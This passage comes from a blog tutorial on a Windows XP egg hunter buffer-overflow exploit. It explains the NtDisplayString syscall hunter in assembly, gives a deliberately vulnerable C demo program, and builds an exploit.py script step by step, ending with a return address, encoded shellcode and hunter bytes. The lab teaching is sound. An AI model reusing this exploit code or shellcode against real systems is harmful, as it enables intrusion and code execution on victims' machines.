class="hljs-string">&quot;)&quot;</span> &lt;&lt; std::endl;<br>    &#125;<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (code[<span class="hljs-number">0</span>] == <span class="hljs-number">0xB8</span>)<br>    &#123;<br>        nSyscall = *(DWORD*)(code + <span class="hljs-number">1</span>);<br>        bSuccess = <span class="hljs-literal">true</span>;<br><br>        std::cout &lt;&lt; std::endl &lt;&lt; <span class="hljs-string">&quot;[+] Detected x86 / WOW64 Pattern:&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;\t-&gt; Machine code: B8 &quot;</span> <br>                  &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">1</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">2</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">3</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">4</span>] <br>                  &lt;&lt; <span class="hljs-string">&quot; (mov eax, 0x&quot;</span> &lt;&lt; nSyscall &lt;&lt; <span class="hljs-string">&quot;)&quot;</span> &lt;&lt; std::endl;<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (bSuccess)<br>    &#123;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;\t-&gt; Syscall number: 0x&quot;</span> &lt;&lt; std::hex &lt;&lt; nSyscall &lt;&lt; std::endl &lt;&lt; std::endl;<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>        std::cout &lt;&lt; std::endl &lt;&lt; <span class="hljs-string">&quot;[-] Unknown code pattern at entry point...&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;   Raw bytes: &quot;</span>;<br>        <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">8</span>; i++) <br>            std::cout &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[i] &lt;&lt; <span class="hljs-string">&quot; &quot;</span>;<br>        std::cout &lt;&lt; std::endl;<br>    &#125;<br>	<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>To compile the program:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs batch">g++ find_syscall_x86.cpp -o find_syscall_x86.exe -static<br>x86_64-w64-mingw32-g++ find_syscall_x64.cpp -o find_syscall_x64.exe -static<br></code></pre></td></tr></table></figure>
<blockquote>
<p>Note: <code>-static</code> is required since some DLL files might be missing on Windows XP.</p>
</blockquote>
<p>Then, we can use the program to find the syscall number of <code>NtDisplayString</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/3.png'><img src="/images/article/2026-9-12-EggHunter/3.png" width=800/>
</p>

<h2 id="int-0x2e"><a href="#int-0x2e" class="headerlink" title="int 0x2e"></a><code>int 0x2e</code></h2><p>In NASM, <code>int</code> stands for <strong>Interrupt</strong>. It pauses the execution of the current user-mode program and forces the CPU to jump into kernel-mode (the operating system’s core). It acts as a secure bridge between user-space (Ring 3) and kernel-space (Ring 0).</p>
<p>When developing an Egg Hunter on Windows XP, you cannot directly scan the process memory using user-mode code. If your code accesses an unallocated memory address, the CPU triggers a page fault, which can cause your exploit to crash.</p>
<blockquote>
<p>Note: You may want to crash your target application, but definitely not your exploit.</p>
</blockquote>
<p>By utilizing <code>int 0x2e</code>, we are asking the <strong>Kernel</strong> to check the memory address for us. Because the Kernel has Ring 0 privileges, it has the ability to safely probe the address. If the address is invalid, the Kernel won’t crash; it will simply return a failure status code (<code>STATUS_ACCESS_VIOLATION</code>) to your code. Again, the CPU and Kernel don’t identify the string name, instead, they use numbers only. just like <code>0x43</code>.</p>
<h2 id="Why-mov-then-pop"><a href="#Why-mov-then-pop" class="headerlink" title="Why mov then pop?"></a>Why mov then pop?</h2><p>In the <code>loop_check</code> section, the <code>push 0x43</code> and <code>pop eax</code> seems very redundant:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-symbol">loop_check:</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-built_in">edx</span>            <span class="hljs-comment">; push edx into the stack</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-number">0x43</span>           <span class="hljs-comment">; push 0x43 (kernel index of NtDisplayString)</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span>             <span class="hljs-comment">; pop 0x43 into eax</span><br>    <span class="hljs-keyword">int</span> <span class="hljs-number">0x2e</span>            <span class="hljs-comment">; syscall</span><br>    <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">al</span>, <span class="hljs-number">0x05</span>        <span class="hljs-comment">; is 0xc0000005 (ACCESS_VIOLATION) ?</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edx</span>             <span class="hljs-comment">; restore edx</span><br></code></pre></td></tr></table></figure>
<p>So, why don’t we just use <code>mov eax, 0x43</code>? The reason is that NASM automatically adds <code>\x00</code>  bytes when encoding the instruction:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/13.png'><img src="/images/article/2026-9-12-EggHunter/13.png" width=800/>
</p>

<p>Therefore, we just <code>push</code> and <code>pop</code> instead of <code>mov</code> directly.</p>
<h2 id="Why-scasd-for-Twice"><a href="#Why-scasd-for-Twice" class="headerlink" title="Why scasd for Twice?"></a>Why <code>scasd</code> for Twice?</h2><p>The last question about the Hunter is in the <code>is_egg</code> section:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-symbol">is_egg:</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-number">0x50905090</span> <span class="hljs-comment">; a tag for our egg (main payload)</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edi</span>, <span class="hljs-built_in">edx</span>        <span class="hljs-comment">; move the value of edx into edi</span><br>    <span class="hljs-keyword">scasd</span>               <span class="hljs-comment">; validate the tag =&gt; if yes: edi = edi + 4</span><br>    <span class="hljs-keyword">jnz</span> loop_inc_one    <span class="hljs-comment">; if not: jump to loop_inc_one, continue scanning</span><br><br>    <span class="hljs-keyword">scasd</span>               <span class="hljs-comment">; compare eax and [edi] (compare twice in total)</span><br><br>    <span class="hljs-keyword">jnz</span> loop_inc_one    <span class="hljs-comment">; if not matched, jump to loop_inc_one</span><br></code></pre></td></tr></table></figure>
<p>Why do we call <code>scasd</code> to compare <code>eax</code> and <code>[edi]</code> for twice? In practice, we will replace the tag <code>0x50905090</code> with four custom characters. This tag can only be hardcoded, which raises an issue: What if the Hunter scans itself?</p>
<p>The answer is that the Hunter might mistake itself for the Egg!</p>
<p>Therefore, we will place our four custom characters twice in the Egg and validate the four custom characters twice in the Hunter. Since the Hunter only has a tag with four characters, it will not mistake itself for the Egg.</p>
<hr>
<p>Finally, we can get back! I hope you didn’t forget what we were doing originally…</p>
<p>To compile the Hunter:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nasm hunter_ntdisplay.asm -o hunter_ntdisplay.bin<br>xxd -i hunter_ntdisplay.bin<br></code></pre></td></tr></table></figure>
<p>Then you will get the result below:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> hunter_ntdisplay_bin[] = &#123;<br>  <span class="hljs-number">0x66</span>, <span class="hljs-number">0x81</span>, <span class="hljs-number">0xca</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0x0f</span>, <span class="hljs-number">0x42</span>, <span class="hljs-number">0x52</span>, <span class="hljs-number">0x6a</span>, <span class="hljs-number">0x43</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0xcd</span>, <span class="hljs-number">0x2e</span>,<br>  <span class="hljs-number">0x3c</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x5a</span>, <span class="hljs-number">0x74</span>, <span class="hljs-number">0xef</span>, <span class="hljs-number">0xb8</span>,<br>  <span class="hljs-number">0x90</span>, <span class="hljs-number">0x50</span>, <span class="hljs-number">0x90</span>, <span class="hljs-number">0x50</span>, <span class="hljs-comment">// &lt;-- Tag of the Egg</span><br>  <span class="hljs-number">0x89</span>, <span class="hljs-number">0xd7</span>,<br>  <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xea</span>, <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xe7</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0xe7</span><br>&#125;;<br></code></pre></td></tr></table></figure>
<p>Next, replace the tag with <code>DEADBEEF</code>:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> hunter_ntdisplay_bin[] = &#123;<br>  <span class="hljs-number">0x66</span>, <span class="hljs-number">0x81</span>, <span class="hljs-number">0xca</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0x0f</span>, <span class="hljs-number">0x42</span>, <span class="hljs-number">0x52</span>, <span class="hljs-number">0x6a</span>, <span class="hljs-number">0x43</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0xcd</span>, <span class="hljs-number">0x2e</span>,<br>  <span class="hljs-number">0x3c</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x5a</span>, <span class="hljs-number">0x74</span>, <span class="hljs-number">0xef</span>, <span class="hljs-number">0xb8</span>,<br>  <span class="hljs-number">0xDE</span>, <span class="hljs-number">0xAD</span>, <span class="hljs-number">0xBE</span>, <span class="hljs-number">0xEF</span>, <span class="hljs-comment">// &lt;-- DEADBEEF</span><br>  <span class="hljs-number">0x89</span>, <span class="hljs-number">0xd7</span>,<br>  <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xea</span>, <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xe7</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0xe7</span><br>&#125;;<br></code></pre></td></tr></table></figure>
<h2 id="Demonstration"><a href="#Demonstration" class="headerlink" title="Demonstration"></a>Demonstration</h2><p>In this section, I will demonstrate the Egg Hunter exploit.</p>
<p>First, create a vulnerable demo program:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>** argv)</span></span><br><span class="hljs-function"></span>&#123;<br>	FILE *pfile;<br>	<span class="hljs-type">char</span> *long_buffer;<br>	<span class="hljs-type">char</span> short_buffer[<span class="hljs-number">64</span>]; <span class="hljs-comment">// small buffer</span><br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Demo...\n&quot;</span>);<br>	<br>	<span class="hljs-keyword">if</span> (argc &gt;= <span class="hljs-number">2</span>)<br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Read: %s\n&quot;</span>, argv[<span class="hljs-number">1</span>]);<br>		pfile = <span class="hljs-built_in">fopen</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;r&quot;</span>);<br>	&#125;<br>		<br>	<span class="hljs-keyword">if</span> (pfile)<br>	&#123;<br>		long_buffer = (<span class="hljs-type">char</span>*)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">2048</span>);<br>		<span class="hljs-built_in">fscanf</span>(pfile, <span class="hljs-string">&quot;%s&quot;</span>, long_buffer);<br>		<br>		<span class="hljs-comment">// do something</span><br>		<br>		<span class="hljs-built_in">free</span>(long_buffer); <span class="hljs-comment">// does it really clear?</span><br>		<br>		<span class="hljs-built_in">fscanf</span>(pfile, <span class="hljs-string">&quot;%s&quot;</span>, short_buffer);<br>	&#125;<br>	<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;End\n&quot;</span>);<br>	<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<blockquote>
<p>Note: I compiled it using Dev-C++ since it lacks modern security mitigations.</p>
</blockquote>
<p>The attack script can be implemented as follows:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_dos</span>():<br>    junk1 = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">1000</span><br>    junk2 = <span class="hljs-string">b&#x27;B&#x27;</span> * <span class="hljs-number">200</span><br><br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;exploit.txt&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        f.write(junk1)<br>        f.write(<span class="hljs-string">b&#x27;\n&#x27;</span>)<br>        f.write(junk2)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_deadbeef</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_exploit</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> args.dos:<br>        make_dos()<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        make_deadbeef()<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        make_exploit()<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python3 exploit.py --dos<br></code></pre></td></tr></table></figure>
<p>Open the vulnerable application in Immunity and pass <code>exploit.txt</code> as an input parameter</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/4.png'><img src="/images/article/2026-9-12-EggHunter/4.png" width=600/>
</p>

<p>Then, the program crashes:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/5.png'><img src="/images/article/2026-9-12-EggHunter/5.png" width=600/>
</p>

<p>Next, find the exact offset using <code>mona</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/6.png'><img src="/images/article/2026-9-12-EggHunter/6.png" width=800/>
</p>

<p>The exact offset is <code>84</code>. I then wrote a proof-of-concept script to overwrite <code>EIP</code> with <code>DEADBEEF</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br>RET_OFFSET = <span class="hljs-number">84</span><br>DEADBEEF = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0xDEADBEEF</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_dos</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_deadbeef</span>():<br>    junk1 = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">1000</span><br>    junk2 = <span class="hljs-string">b&#x27;B&#x27;</span> * RET_OFFSET<br><br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;exploit.txt&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        f.write(junk1)<br>        f.write(<span class="hljs-string">b&#x27;\n&#x27;</span>)<br>        f.write(junk2)<br>        f.write(DEADBEEF)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_exploit</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> args.dos:<br>        make_dos()<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        make_deadbeef()<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        make_exploit()<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/7.png'><img src="/images/article/2026-9-12-EggHunter/7.png" width=600/>
</p>

<p>Note that current <code>ESP</code> is <code>0x0022FF00</code>, while the end of the stack is <code>0x0022FFFC</code>, which only gives us <code>0xFC</code> (<code>252</code> in decimal) bytes to store our shellcode. Obviously, it is insufficient.</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/8.png'><img src="/images/article/2026-9-12-EggHunter/8.png" width=600/>
</p>

<p>Find an address that executes <code>jmp esp</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/9.png'><img src="/images/article/2026-9-12-EggHunter/9.png" width=800/>
</p>

<p>Finally, the exploit script can be implemented as follows:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> argparse<br><span class="hljs-keyword">import</span> struct<br><br>parser = argparse.ArgumentParser()<br>parser.add_argument(<span class="hljs-string">&#x27;--dos&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--deadbeef&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>parser.add_argument(<span class="hljs-string">&#x27;--exploit&#x27;</span>, action=<span class="hljs-string">&#x27;store_true&#x27;</span>)<br>args = parser.parse_args()<br><br>RET_OFFSET = <span class="hljs-number">84</span><br>RET = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x7c874f13</span>)<br>EGG_TAG = <span class="hljs-string">b&#x27;\xDE\xAD\xBE\xEF&#x27;</span><br><br>egg_code =  <span class="hljs-string">b&quot;&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xba\xa9\x98\xa3\x7e\xda\xc7\xd9\x74\x24\xf4&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x5e\x29\xc9\xb1\x31\x31\x56\x13\x83\xee\xfc&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x03\x56\xa6\x7a\x56\x82\x50\xf8\x99\x7b\xa0&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x9d\x10\x9e\x91\x9d\x47\xea\x81\x2d\x03\xbe&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x2d\xc5\x41\x2b\xa6\xab\x4d\x5c\x0f\x01\xa8&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x53\x90\x3a\x88\xf2\x12\x41\xdd\xd4\x2b\x8a&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x10\x14\x6c\xf7\xd9\x44\x25\x73\x4f\x79\x42&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xc9\x4c\xf2\x18\xdf\xd4\xe7\xe8\xde\xf5\xb9&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x63\xb9\xd5\x38\xa0\xb1\x5f\x23\xa5\xfc\x16&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xd8\x1d\x8a\xa8\x08\x6c\x73\x06\x75\x41\x86&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x56\xb1\x65\x79\x2d\xcb\x96\x04\x36\x08\xe5&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xd2\xb3\x8b\x4d\x90\x64\x70\x6c\x75\xf2\xf3&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x62\x32\x70\x5b\x66\xc5\x55\xd7\x92\x4e\x58&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x38\x13\x14\x7f\x9c\x78\xce\x1e\x85\x24\xa1&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x1f\xd5\x87\x1e\xba\x9d\x25\x4a\xb7\xff\x23&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x8d\x45\x7a\x01\x8d\x55\x85\x35\xe6\x64\x0e&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xda\x71\x79\xc5\x9f\x8e\x33\x44\x89\x06\x9a&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x1c\x88\x4a\x1d\xcb\xce\x72\x9e\xfe\xae\x80&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\xbe\x8a\xab\xcd\x78\x66\xc1\x5e\xed\x88\x76&quot;</span><br>egg_code += <span class="hljs-string">b&quot;\x5e\x24\xeb\x19\xcc\xa4\xc2\xbc\x74\x4e\x1b&quot;</span><br><br><span class="hljs-comment"># NtDisplayString</span><br>hunter = <span class="hljs-string">b&quot;&quot;</span><br>hunter += <span class="hljs-string">b&quot;\x66\x81\xca\xff\x0f&quot;</span>   <span class="hljs-comment"># or dx, 0x0fff</span><br>hunter += <span class="hljs-string">b&quot;\x42&quot;</span>                   <span class="hljs-comment"># inc edx</span><br>hunter += <span class="hljs-string">b&quot;\x52&quot;</span>                   <span class="hljs-comment"># push edx</span><br>hunter += <span class="hljs-string">b&quot;\x6a\x43&quot;</span>               <span class="hljs-comment"># push 0x43</span><br>hunter += <span class="hljs-string">b&quot;\x58&quot;</span>                   <span class="hljs-comment"># pop eax</span><br>hunter += <span class="hljs-string">b&quot;\xcd\x2e&quot;</span>               <span class="hljs-comment"># int 0x2e</span><br>hunter += <span class="hljs-string">b&quot;\x3c\x05&quot;</span>               <span class="hljs-comment"># cmp al, 0x05</span><br>hunter += <span 